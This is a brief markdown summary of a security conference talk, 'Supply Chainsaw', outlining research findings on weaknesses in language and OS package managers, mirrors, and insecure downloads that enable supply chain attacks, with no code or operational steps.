23 строки
1.6 KiB
Markdown
23 строки
1.6 KiB
Markdown
# Supply Chainsaw: Practical software supply chain attacks for everyone
|
||
|
||
I recently presented Supply Chainsaw: Practical software supply chain attacks for everyone at the OPCDE technical security conference in Dubai.
|
||
|
||
In between pictures of Sharknadoes and memes were an array of software supply chain attacks:
|
||
|
||
- We proved most programming language package managers have major security weaknesses
|
||
* Typo or wrong command attacks compromise those who make mistakes installing packages
|
||
* Anonymous automatic registration and publishing make attacks easy
|
||
* Weak authentication, no 2-factor, sometimes none at all
|
||
* Developers of popular open-source packages and their powerful credentials are exposed to many different attacks through the development process and permanent credential caching
|
||
- Operating system package managers are manual-review and harder to poison
|
||
- But nearly every OS is acquired insecurely and unlikely to be verified by the user, from Linux to Mac OS, to Windows
|
||
- MITM attacks proven practical against proxy/VPN/Tor users - over 5,000 potential opportunities to poison executable downloads in my test
|
||
- We became OS and package mirrors to prove
|
||
* Anyone could infect packages and OS’s delivered via mirror
|
||
* Can be quick, cheap, anonymous, with worldwide effect
|
||
* Packages often are not verified against anything external
|
||
* We were never denied anything we asked for
|
||
* We are running honest mirrors, but we have no guarantee others are trustworthy or have not been compromised
|
||
- Between hundreds and millions of users can be compromised using these techniques
|
||
- Supply chain attacks are happening in the wild now
|